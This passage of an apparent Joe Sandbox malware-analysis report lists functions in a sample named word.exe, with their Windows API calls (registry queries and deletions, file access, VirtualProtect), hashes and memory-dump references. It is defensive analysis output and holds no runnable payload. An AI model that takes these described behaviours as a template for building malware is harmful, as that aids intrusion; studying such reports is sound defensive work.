Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_word.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
Instruction ID: 2b4501ff186f60f2b29b8b71d76009b37135a14f8b8ad132536a4a21bb517402
Opcode Fuzzy Hash: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
Instruction Fuzzy Hash: 9E51A4BA908214DFFB14DF60DCC5B5937A8EB443D4F218429EA08E725DDF38A981CB94

Function 004023C8 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000421,00000000,00000022,00000000,?,?), ref: 00402B2F

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F8
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsy9448.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 10ba0a2ded20e0eaacffac804a89d1e59f4dec69291e3d48a6a341987dad6e6f
Instruction ID: 0332112a018d0e07836895fa5cafc858bad159e104d866fff78bcbb739cef185
Opcode Fuzzy Hash: 10ba0a2ded20e0eaacffac804a89d1e59f4dec69291e3d48a6a341987dad6e6f
Instruction Fuzzy Hash: C111C171905205EFDB11DF60CA889BEBBB4EF00344F20843FE442B62C0D2B84A41EB6A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction ID: da56ad7cfcb2a9fecb994a09e4a0bd113f750103611445cd7b28aada07ee45e3
Opcode Fuzzy Hash: a519dadb84f5fbb5742ded63e05e15cde03a873041ee9604df24846d4002906c
Instruction Fuzzy Hash: 2E012831B24210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D

Function 004022C0 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000421,00000000,00000022,00000000,?,?), ref: 00402B2F

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DF
RegCloseKey.ADVAPI32(00000000), ref: 004022E8

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 4a9268794865c303a6a77ff665202cafa5f9ded8a04515ed4fa51fe5aaede73d
Instruction ID: 2c42072c31bcbbe471fcd7c214f11599c8a5ac898b8b604777345a29c8a948e9
Opcode Fuzzy Hash: 4a9268794865c303a6a77ff665202cafa5f9ded8a04515ed4fa51fe5aaede73d
Instruction Fuzzy Hash: 65F04F72A04111ABDB51ABB49A8EAAE6268AB40318F14453BF501B61C1DAFC5E01A66E

Function 00401DAC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
EnableWindow.USER32(00000000,00000000), ref: 00401DCD

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: c6481de3b2b51c751ee50e75985596145f399553e3c283b57367eaa578fd6938
Instruction ID: 18ac702c75a7039fec00373c4f699ed09bc4c8ec852dd7b5b9a0ef8cb6e9c66a
Opcode Fuzzy Hash: c6481de3b2b51c751ee50e75985596145f399553e3c283b57367eaa578fd6938
Instruction Fuzzy Hash: 39E0CD72B04110EBCB10BBB45D4A55E3374DF10359B10443BF501F11C1D2B85C40565D

Function 00405982 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 00405986
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
Instruction ID: 21e5f81f3e52fa2c8f9e5bc24a994218dd140026ef3a1e453d479de883aad6ce
Opcode Fuzzy Hash: b262a0f40d66ad03986e5cb00ab33bb84fd1bf9937e58ea257525f7228853690
Instruction Fuzzy Hash: 94D09E31668301AFEF098F20DD16F2E7BA2EB84B00F10562CB682D40E0D6755815DB16

Function 00402519 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: wsprintf
String ID:
API String ID: 2111968516-0
Opcode ID: 5ca30871d32c3bef29aa461ff56dd0d1291972abc5c864dbc3376281af39e19a
Instruction ID: f0060f760cc0cb7bea83be527089eb0080f75fd7230c997017a3eb13d9afc21a
Opcode Fuzzy Hash: 5ca30871d32c3bef29aa461ff56dd0d1291972abc5c864dbc3376281af39e19a
Instruction Fuzzy Hash: AE21FB70D05295BEDF229F644E581EEBBB09B05304F64417FE491B63C5D1BC9A81C72D

Function 0040223B Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402274

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
Instruction ID: 05d4d75dbd01593bae97f630dbecede8c42f44da552b6d0f9ca4defc7305ba5b
Opcode Fuzzy Hash: 9ff6483e56f83e050050973c75d29e7e6846100e3a8c6593062fb544488b0e4d
Instruction Fuzzy Hash: 2FE04F72B001696ADB903AF18F8DD7F21597B84304F15067EF611B62C2D9BC0D81A2B9

Function 004025D3 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025ED

Part of subcall function 00405C4F: wsprintfA.USER32 ref: 00405C5C

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 6d04ba6cf2fc6a85b27f9d7cfe527d6dfc931eb18d9fe9c26450760e99d2a917
Instruction ID: e3c9d548799916fc1e7ab0b1e8fbae79452bd5b72cf6fc21fc218063dca289f2
Opcode Fuzzy Hash: 6d04ba6cf2fc6a85b27f9d7cfe527d6dfc931eb18d9fe9c26450760e99d2a917
Instruction Fuzzy Hash: 56E04FB6A04220BBDB01BBA55E4ADBF67A8DB60309B14853BF501F00C1C7BC49019A2E

Function 00402B07 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(00000000,00000421,00000000,00000022,00000000,?,?), ref: 00402B2F

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
Instruction ID: 087740a894708ae54e311fe38564fcb001a0ed9e3d0f4d4a62d19f1d4de25a1d
Opcode Fuzzy Hash: ebfeba3ed9c8d95cb46d76ca19a6c1a04daa5e79448631d0a062a8db0bedbb5d
Instruction Fuzzy Hash: 38E046B6250108AADB40EFA4EE4AF9537ECFB04700F008021BA08E7091CA78E5509B69

Function 004059FA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00000000,004128A0,0040A8A0,004031C9,00409130,00409130,004030BB,004128A0,00004000,?,00000000,?), ref: 00405A0E

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
Instruction ID: b1acdbea0b5305796381949641a39caa05877223dc774253bf026a704a199e6f
Opcode Fuzzy Hash: 36ce21e0183dc59356ed1b7b138b7ffe2bb5c4fd6ccae5392a8977301763c5ee
Instruction Fuzzy Hash: 3AE0E632714159ABDF109E559C41FEB779CEF05350F044532F915E6150E231E8219FA5

Function 1000270F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(1000404C,?,?,1000403C), ref: 1000272D

Memory Dump Source

Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_word.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction ID: 4dab7c069dd6fc30f8915db09394f7f991a1b088a201bba37056324bf7fcc065
Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction Fuzzy Hash: 98F09BF19092A0DEF360DF688CC47063FE4E3993D5B03852AE358F6269EB7441448B19

Function 0040227F Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022B2

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
Instruction ID: 1024819f7f1d2ea578916dba6ac29c28ac22902c13986e1de9ff5d702d2d6265
Opcode Fuzzy Hash: f8d132d461a5c4ed5c76335474cd8e98aaa4b1821b9353edac55918b86fd9ae5
Instruction Fuzzy Hash: B9E08671A44209BADB406FA08E09EBD3668BF01710F10013AF9507B0D1EBB88442F72D

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNELBASE(00000000,?,?), ref: 004015A0

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 73dd263cc16519303ec7764465a471deb27e32fa1ac2c7a341e96c07e1019198
Instruction ID: bed2877986d8c12a83e01492d596720214e57a472dec7050afa6ab6fccae40cd
Opcode Fuzzy Hash: 73dd263cc16519303ec7764465a471deb27e32fa1ac2c7a341e96c07e1019198
Instruction Fuzzy Hash: 17D01277B08114E7DB00DBB5AE48A9E73A4FB50325F208637D111F11D0D3B98551A629

Function 004031CC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014E5

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 89a3138968292bab01d7131142a88cb84c5e6bf95ef28c2e228963085d41211d
Instruction ID: 4daead48d26ae6742cc4751adb680189456718570d67c7320b978f12710e1ab5
Opcode Fuzzy Hash: 89a3138968292bab01d7131142a88cb84c5e6bf95ef28c2e228963085d41211d
Instruction Fuzzy Hash: DFD0C7B7B141006BD750E7B86E8545A73E8F75135A7148837D502E1191D17DC9415519

Function 004057AC Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,004032C4,"C:\Users\user\Desktop\word.exe",00000020), ref: 004057B9

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
Instruction ID: 89ef04895189e0a570f69afc6b3983d50e9fc015b7b22d5900b2b0617734604f
Opcode Fuzzy Hash: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
